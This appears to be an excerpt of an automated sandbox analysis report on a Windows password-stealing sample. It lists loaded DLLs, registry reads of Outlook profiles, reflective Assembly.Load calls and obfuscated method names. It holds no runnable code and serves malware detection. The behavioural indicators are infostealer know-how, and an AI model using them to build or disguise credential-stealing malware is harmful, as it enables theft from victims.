                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, yO87opgGJjyrnBtI4D.cs.Net Code: hipwAw5onb System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.7100000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, yO87opgGJjyrnBtI4D.cs.Net Code: hipwAw5onb System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.2c33f50.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, yO87opgGJjyrnBtI4D.cs.Net Code: hipwAw5onb System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_07133757 push 3861A8E5h; iretd 0_2_0713375C
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_071315BA push ds; retf 0_2_071315BB
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_07134DE9 pushfd ; ret 0_2_07134DEA
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_07132AF7 pushad ; retf 0_2_07132B05
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeCode function: 0_2_073B2AED push edi; retf 0_2_073B2AEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F90CB5 push edi; ret 4_2_02F90CC2
                      Source: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeStatic PE information: section name: .text entropy: 7.940688568978032
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, uEfQpPw7r64ECRvuxw.csHigh entropy of concatenated method names: 'xUftCgZETs', 'uO4tgAk6hk', 'x0Utx1lrQc', 'nIut1pTFTP', 'NDVtbl2rnS', 'GTltN1b77U', 'j1IbsNsQEIi4AiwySd', 'UvZtcS9wMFXATtkWZ0', 'WptttSqcTy', 'z33tMln0iD'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, yO87opgGJjyrnBtI4D.csHigh entropy of concatenated method names: 'buhMUMipT4', 'KO7M2w5YQg', 'JoUMuN9xRa', 'N4WM7RORss', 'BSyMcbZk4G', 'Y2XMYXBda5', 'W8EMCV2lYt', 'Lj0MgZRx8N', 'c8qM5IQkpq', 'xT5Mx6KxWI'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, WgBQVNL8iLVZNExR4O.csHigh entropy of concatenated method names: 'TDN8Wuxwwu', 'As88ykcIKJ', 'vP1BvKKQek', 'l3MBtMaCae', 'Yay8DaOGtV', 'X518KrNvBL', 'BBx8V5GFs8', 'PPV8axjS4W', 'pCD8IUbB7J', 'Ye18FKjHnt'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, XwCMUZQRW3vmymhFVQ.csHigh entropy of concatenated method names: 'VTmYFXADu8', 'GQYYlR4TRj', 'UkSYh5ZBcE', 'ToString', 'xSNYL8OWr8', 'JnJY4IHkXI', 'dXMIT16mqcpPGftQYuD', 'cWs2hV6whlcd50bomZ4', 'jNeDGU6Fix0Te1FCYDX'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, PmSxfe00U1lrQcmIup.csHigh entropy of concatenated method names: 'Cyb7JlODD8', 'Qn17d11dTL', 'NPf7G1gHRB', 'vaA70vv6tw', 'jw77bPs5oL', 'Uv87NhjWy9', 'HHD78uYdhe', 'hMy7BbFmvt', 'hLw7nGU3o7', 'Ltl7qwhI7O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, XsxrdIWsPUcGWSPM3f.csHigh entropy of concatenated method names: 'vefB2MelnM', 'EqoBu7w4WY', 'khSB7oMuBg', 'rEtBc59mYK', 'CTUBYCrxaY', 'yvVBCkGfDD', 'LarBgNJuDX', 'qXIB59mD3X', 'wOCBx7L6uI', 'T3cB1yy4Qs'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, apVDF3ytE9NUPZN6Id.csHigh entropy of concatenated method names: 'LOInt5eXZJ', 'H1rnM0AU80', 'Q66nwqfhBM', 'REFn2t312c', 'e4qnuZRgDU', 'fsEnc8ufZx', 'C9DnYZWxJ1', 'jhVB43Ag9p', 'Y93BWU57Sy', 'MBIBT5vaL3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, zpwngdl5wxuDENdFPO.csHigh entropy of concatenated method names: 'kxC8xcc98f', 'jVO81R9M0D', 'ToString', 'Bq082uLpBq', 'Kti8uk6KDg', 'gsP87AROKU', 'SjI8cNO4hU', 'MHS8YKH1Th', 'SvS8CtnmuE', 'IlF8ggTju9'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, FeCemCTNFOXFVtyVD8.csHigh entropy of concatenated method names: 'CI3BrajRgy', 'yvFBOylbJe', 'AMFBHfKRQs', 'GvFBS4cjBr', 'BA6BaBO9ll', 'vYVB9XpQar', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, P43aBXab3R4dAcEkKc.csHigh entropy of concatenated method names: 'rlcb399Sai', 'IyCbK6tm4A', 'JiMba8ClQJ', 'orVbIRDEQK', 'yaJbOWgWDZ', 'hpqbHcfnFC', 'I4NbSYqgVr', 'qE5b9PMMPN', 'hpHbQysYlc', 'DPibXgHVl4'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, JZh1tCV2H3bUWy7u4s.csHigh entropy of concatenated method names: 'G0QmGetNln', 'NlLm0kTyLB', 'gAImrklv7B', 'cH0mOkUlb4', 'IZ1mSvWXZs', 'yXNm9Twsu8', 'WW5mX9Dt2x', 'Vm0mfFAq6P', 'Djym33S71J', 'eWHmDb7nmd'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, GnSOTlr1b77UloFibg.csHigh entropy of concatenated method names: 'WKVYUKqkJR', 'gjgYuyTiGG', 'e81YcShygu', 'fwyYCvohht', 'BruYg1HBpK', 'IelchYVhk4', 'xjhcLR7oIg', 'rnfc4gbKMT', 'REhcWngy5m', 'U8CcT5gLmm'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, E0rExKie3hHCJPFZff.csHigh entropy of concatenated method names: 'bxHAcIv0w', 'qB5JGOqtu', 'LsDdvUJsh', 'K7rRmcqTN', 'Wy60JggWE', 'uZLj0awby', 'zeX3U5VALuwFXl0mYW', 'BuNwCmZWwELlRCgqHD', 'lVGBdcsxL', 'gqGqpMh9O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, KChJkgXrF9FCTRZi8C.csHigh entropy of concatenated method names: 'gBXC20oes1', 'l0SC77491C', 'FesCYbuDu0', 'ShpYyCXy3U', 'ihLYzYGVgo', 'OoVCviRZnd', 's8HCt9dL5D', 'tA5CiT09qj', 'FYnCMm0IUL', 'EATCwmHXdG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, Hl6kJnF7o6y5N48Hyr.csHigh entropy of concatenated method names: 'ToString', 'VgNND3uSwY', 'eOsNOABW7m', 'pJfNHJfYsZ', 'uGvNSg6oii', 'na1N9vkIfp', 'lW3NQvrYsy', 'I6WNXFlYFS', 'p2uNft13R3', 'd1WNE0hXl3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, gr9N19u0UekdRQeJfn.csHigh entropy of concatenated method names: 'Dispose', 'LR6tT198Q3', 'Yq4iOVwGXX', 'ua266f1iM3', 'DTstyxrdIs', 'uUctzGWSPM', 'ProcessDialogKey', 'NfjiveCemC', 'pFOitXFVty', 'PD8iitpVDF'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, MgZETsGPO4Ak6hkigF.csHigh entropy of concatenated method names: 'FSVuanb8wK', 'NsLuIR2eMV', 'HixuFylLas', 'uLGulstONi', 'vhquh5saAL', 'WdvuLl95Vx', 'JD5u4SYalZ', 'TbsuWYMysl', 'cwjuTToYLV', 'j72uy2TnGo'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, z5E0BltMwdUb6Ko9cao.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'G2ZqaO4Z0Z', 'KywqINd4Jb', 'RhtqFlmmXO', 'VXHqlH3bQp', 'WOuqhkk2Yd', 'KrOqLrf9Io', 'zDWq4WO9nG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, otPKVEEkVy5OK1pSff.csHigh entropy of concatenated method names: 'LqPCZphQjH', 'C5LCodrQU7', 'Y3HCA40coN', 'ckDCJY58vD', 'rXCCklbouq', 'AxNCdpCdCc', 'Fl0CRMbhu9', 'zd4CGn2Z9D', 'aDnC0g6PMA', 'qImCjwHexn'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, XwsHKfzum4RCm3S1g5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SrRnmMM5Nc', 'ovSnbAYV7T', 'X4mnNbNWs9', 'PWvn8r1N9D', 'YQdnBH0Nd9', 'BPFnn7dh6M', 'gEcnqWEFYu'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, XFTP5YjZW0srB3DVl2.csHigh entropy of concatenated method names: 'Oofck1r9o6', 'Rr6cR2URL4', 'ucE7HDkCRt', 'T197SspOqk', 'X2X7969rBA', 'uyh7QdPYHk', 'CNB7X4rJul', 'yIb7f0f3q6', 'uZE7ErAf2C', 'xmL73HBQMJ'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, ydfk6w7eOCbZcMNaQJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w2KiT2XD8L', 'zaGiyRHXA2', 'xR0izSQ2r3', 'cHgMvyw4wE', 'U6yMtP4hQd', 'KZ8Mi9ngCv', 'YDaMMLIgQc', 'RXpEUMrtps82hWcNHKK'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, ApRph4tvlQksfJT0qoC.csHigh entropy of concatenated method names: 'ImlnZK1dJ6', 'qnvnosKQ9B', 'yefnA5wIao', 'iZcnJiK5S6', 'uRPnkusbHM', 'YvWndN3ZVf', 'yFtnRA3x9v', 'rm3nG7vMUH', 'V76n0bnILq', 'EQRnjk8Fa2'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, uEfQpPw7r64ECRvuxw.csHigh entropy of concatenated method names: 'xUftCgZETs', 'uO4tgAk6hk', 'x0Utx1lrQc', 'nIut1pTFTP', 'NDVtbl2rnS', 'GTltN1b77U', 'j1IbsNsQEIi4AiwySd', 'UvZtcS9wMFXATtkWZ0', 'WptttSqcTy', 'z33tMln0iD'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, yO87opgGJjyrnBtI4D.csHigh entropy of concatenated method names: 'buhMUMipT4', 'KO7M2w5YQg', 'JoUMuN9xRa', 'N4WM7RORss', 'BSyMcbZk4G', 'Y2XMYXBda5', 'W8EMCV2lYt', 'Lj0MgZRx8N', 'c8qM5IQkpq', 'xT5Mx6KxWI'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, WgBQVNL8iLVZNExR4O.csHigh entropy of concatenated method names: 'TDN8Wuxwwu', 'As88ykcIKJ', 'vP1BvKKQek', 'l3MBtMaCae', 'Yay8DaOGtV', 'X518KrNvBL', 'BBx8V5GFs8', 'PPV8axjS4W', 'pCD8IUbB7J', 'Ye18FKjHnt'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, XwCMUZQRW3vmymhFVQ.csHigh entropy of concatenated method names: 'VTmYFXADu8', 'GQYYlR4TRj', 'UkSYh5ZBcE', 'ToString', 'xSNYL8OWr8', 'JnJY4IHkXI', 'dXMIT16mqcpPGftQYuD', 'cWs2hV6whlcd50bomZ4', 'jNeDGU6Fix0Te1FCYDX'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, PmSxfe00U1lrQcmIup.csHigh entropy of concatenated method names: 'Cyb7JlODD8', 'Qn17d11dTL', 'NPf7G1gHRB', 'vaA70vv6tw', 'jw77bPs5oL', 'Uv87NhjWy9', 'HHD78uYdhe', 'hMy7BbFmvt', 'hLw7nGU3o7', 'Ltl7qwhI7O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, XsxrdIWsPUcGWSPM3f.csHigh entropy of concatenated method names: 'vefB2MelnM', 'EqoBu7w4WY', 'khSB7oMuBg', 'rEtBc59mYK', 'CTUBYCrxaY', 'yvVBCkGfDD', 'LarBgNJuDX', 'qXIB59mD3X', 'wOCBx7L6uI', 'T3cB1yy4Qs'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, apVDF3ytE9NUPZN6Id.csHigh entropy of concatenated method names: 'LOInt5eXZJ', 'H1rnM0AU80', 'Q66nwqfhBM', 'REFn2t312c', 'e4qnuZRgDU', 'fsEnc8ufZx', 'C9DnYZWxJ1', 'jhVB43Ag9p', 'Y93BWU57Sy', 'MBIBT5vaL3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, zpwngdl5wxuDENdFPO.csHigh entropy of concatenated method names: 'kxC8xcc98f', 'jVO81R9M0D', 'ToString', 'Bq082uLpBq', 'Kti8uk6KDg', 'gsP87AROKU', 'SjI8cNO4hU', 'MHS8YKH1Th', 'SvS8CtnmuE', 'IlF8ggTju9'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, FeCemCTNFOXFVtyVD8.csHigh entropy of concatenated method names: 'CI3BrajRgy', 'yvFBOylbJe', 'AMFBHfKRQs', 'GvFBS4cjBr', 'BA6BaBO9ll', 'vYVB9XpQar', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, P43aBXab3R4dAcEkKc.csHigh entropy of concatenated method names: 'rlcb399Sai', 'IyCbK6tm4A', 'JiMba8ClQJ', 'orVbIRDEQK', 'yaJbOWgWDZ', 'hpqbHcfnFC', 'I4NbSYqgVr', 'qE5b9PMMPN', 'hpHbQysYlc', 'DPibXgHVl4'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, JZh1tCV2H3bUWy7u4s.csHigh entropy of concatenated method names: 'G0QmGetNln', 'NlLm0kTyLB', 'gAImrklv7B', 'cH0mOkUlb4', 'IZ1mSvWXZs', 'yXNm9Twsu8', 'WW5mX9Dt2x', 'Vm0mfFAq6P', 'Djym33S71J', 'eWHmDb7nmd'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, GnSOTlr1b77UloFibg.csHigh entropy of concatenated method names: 'WKVYUKqkJR', 'gjgYuyTiGG', 'e81YcShygu', 'fwyYCvohht', 'BruYg1HBpK', 'IelchYVhk4', 'xjhcLR7oIg', 'rnfc4gbKMT', 'REhcWngy5m', 'U8CcT5gLmm'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, E0rExKie3hHCJPFZff.csHigh entropy of concatenated method names: 'bxHAcIv0w', 'qB5JGOqtu', 'LsDdvUJsh', 'K7rRmcqTN', 'Wy60JggWE', 'uZLj0awby', 'zeX3U5VALuwFXl0mYW', 'BuNwCmZWwELlRCgqHD', 'lVGBdcsxL', 'gqGqpMh9O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, KChJkgXrF9FCTRZi8C.csHigh entropy of concatenated method names: 'gBXC20oes1', 'l0SC77491C', 'FesCYbuDu0', 'ShpYyCXy3U', 'ihLYzYGVgo', 'OoVCviRZnd', 's8HCt9dL5D', 'tA5CiT09qj', 'FYnCMm0IUL', 'EATCwmHXdG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, Hl6kJnF7o6y5N48Hyr.csHigh entropy of concatenated method names: 'ToString', 'VgNND3uSwY', 'eOsNOABW7m', 'pJfNHJfYsZ', 'uGvNSg6oii', 'na1N9vkIfp', 'lW3NQvrYsy', 'I6WNXFlYFS', 'p2uNft13R3', 'd1WNE0hXl3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, gr9N19u0UekdRQeJfn.csHigh entropy of concatenated method names: 'Dispose', 'LR6tT198Q3', 'Yq4iOVwGXX', 'ua266f1iM3', 'DTstyxrdIs', 'uUctzGWSPM', 'ProcessDialogKey', 'NfjiveCemC', 'pFOitXFVty', 'PD8iitpVDF'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, MgZETsGPO4Ak6hkigF.csHigh entropy of concatenated method names: 'FSVuanb8wK', 'NsLuIR2eMV', 'HixuFylLas', 'uLGulstONi', 'vhquh5saAL', 'WdvuLl95Vx', 'JD5u4SYalZ', 'TbsuWYMysl', 'cwjuTToYLV', 'j72uy2TnGo'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, z5E0BltMwdUb6Ko9cao.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'G2ZqaO4Z0Z', 'KywqINd4Jb', 'RhtqFlmmXO', 'VXHqlH3bQp', 'WOuqhkk2Yd', 'KrOqLrf9Io', 'zDWq4WO9nG'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, otPKVEEkVy5OK1pSff.csHigh entropy of concatenated method names: 'LqPCZphQjH', 'C5LCodrQU7', 'Y3HCA40coN', 'ckDCJY58vD', 'rXCCklbouq', 'AxNCdpCdCc', 'Fl0CRMbhu9', 'zd4CGn2Z9D', 'aDnC0g6PMA', 'qImCjwHexn'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, XwsHKfzum4RCm3S1g5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SrRnmMM5Nc', 'ovSnbAYV7T', 'X4mnNbNWs9', 'PWvn8r1N9D', 'YQdnBH0Nd9', 'BPFnn7dh6M', 'gEcnqWEFYu'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, XFTP5YjZW0srB3DVl2.csHigh entropy of concatenated method names: 'Oofck1r9o6', 'Rr6cR2URL4', 'ucE7HDkCRt', 'T197SspOqk', 'X2X7969rBA', 'uyh7QdPYHk', 'CNB7X4rJul', 'yIb7f0f3q6', 'uZE7ErAf2C', 'xmL73HBQMJ'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, ydfk6w7eOCbZcMNaQJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w2KiT2XD8L', 'zaGiyRHXA2', 'xR0izSQ2r3', 'cHgMvyw4wE', 'U6yMtP4hQd', 'KZ8Mi9ngCv', 'YDaMMLIgQc', 'RXpEUMrtps82hWcNHKK'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.a320000.7.raw.unpack, ApRph4tvlQksfJT0qoC.csHigh entropy of concatenated method names: 'ImlnZK1dJ6', 'qnvnosKQ9B', 'yefnA5wIao', 'iZcnJiK5S6', 'uRPnkusbHM', 'YvWndN3ZVf', 'yFtnRA3x9v', 'rm3nG7vMUH', 'V76n0bnILq', 'EQRnjk8Fa2'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, uEfQpPw7r64ECRvuxw.csHigh entropy of concatenated method names: 'xUftCgZETs', 'uO4tgAk6hk', 'x0Utx1lrQc', 'nIut1pTFTP', 'NDVtbl2rnS', 'GTltN1b77U', 'j1IbsNsQEIi4AiwySd', 'UvZtcS9wMFXATtkWZ0', 'WptttSqcTy', 'z33tMln0iD'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, yO87opgGJjyrnBtI4D.csHigh entropy of concatenated method names: 'buhMUMipT4', 'KO7M2w5YQg', 'JoUMuN9xRa', 'N4WM7RORss', 'BSyMcbZk4G', 'Y2XMYXBda5', 'W8EMCV2lYt', 'Lj0MgZRx8N', 'c8qM5IQkpq', 'xT5Mx6KxWI'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, WgBQVNL8iLVZNExR4O.csHigh entropy of concatenated method names: 'TDN8Wuxwwu', 'As88ykcIKJ', 'vP1BvKKQek', 'l3MBtMaCae', 'Yay8DaOGtV', 'X518KrNvBL', 'BBx8V5GFs8', 'PPV8axjS4W', 'pCD8IUbB7J', 'Ye18FKjHnt'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, XwCMUZQRW3vmymhFVQ.csHigh entropy of concatenated method names: 'VTmYFXADu8', 'GQYYlR4TRj', 'UkSYh5ZBcE', 'ToString', 'xSNYL8OWr8', 'JnJY4IHkXI', 'dXMIT16mqcpPGftQYuD', 'cWs2hV6whlcd50bomZ4', 'jNeDGU6Fix0Te1FCYDX'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, PmSxfe00U1lrQcmIup.csHigh entropy of concatenated method names: 'Cyb7JlODD8', 'Qn17d11dTL', 'NPf7G1gHRB', 'vaA70vv6tw', 'jw77bPs5oL', 'Uv87NhjWy9', 'HHD78uYdhe', 'hMy7BbFmvt', 'hLw7nGU3o7', 'Ltl7qwhI7O'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, XsxrdIWsPUcGWSPM3f.csHigh entropy of concatenated method names: 'vefB2MelnM', 'EqoBu7w4WY', 'khSB7oMuBg', 'rEtBc59mYK', 'CTUBYCrxaY', 'yvVBCkGfDD', 'LarBgNJuDX', 'qXIB59mD3X', 'wOCBx7L6uI', 'T3cB1yy4Qs'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, apVDF3ytE9NUPZN6Id.csHigh entropy of concatenated method names: 'LOInt5eXZJ', 'H1rnM0AU80', 'Q66nwqfhBM', 'REFn2t312c', 'e4qnuZRgDU', 'fsEnc8ufZx', 'C9DnYZWxJ1', 'jhVB43Ag9p', 'Y93BWU57Sy', 'MBIBT5vaL3'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, zpwngdl5wxuDENdFPO.csHigh entropy of concatenated method names: 'kxC8xcc98f', 'jVO81R9M0D', 'ToString', 'Bq082uLpBq', 'Kti8uk6KDg', 'gsP87AROKU', 'SjI8cNO4hU', 'MHS8YKH1Th', 'SvS8CtnmuE', 'IlF8ggTju9'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, FeCemCTNFOXFVtyVD8.csHigh entropy of concatenated method names: 'CI3BrajRgy', 'yvFBOylbJe', 'AMFBHfKRQs', 'GvFBS4cjBr', 'BA6BaBO9ll', 'vYVB9XpQar', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, P43aBXab3R4dAcEkKc.csHigh entropy of concatenated method names: 'rlcb399Sai', 'IyCbK6tm4A', 'JiMba8ClQJ', 'orVbIRDEQK', 'yaJbOWgWDZ', 'hpqbHcfnFC', 'I4NbSYqgVr', 'qE5b9PMMPN', 'hpHbQysYlc', 'DPibXgHVl4'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, JZh1tCV2H3bUWy7u4s.csHigh entropy of concatenated method names: 'G0QmGetNln', 'NlLm0kTyLB', 'gAImrklv7B', 'cH0mOkUlb4', 'IZ1mSvWXZs', 'yXNm9Twsu8', 'WW5mX9Dt2x', 'Vm0mfFAq6P', 'Djym33S71J', 'eWHmDb7nmd'
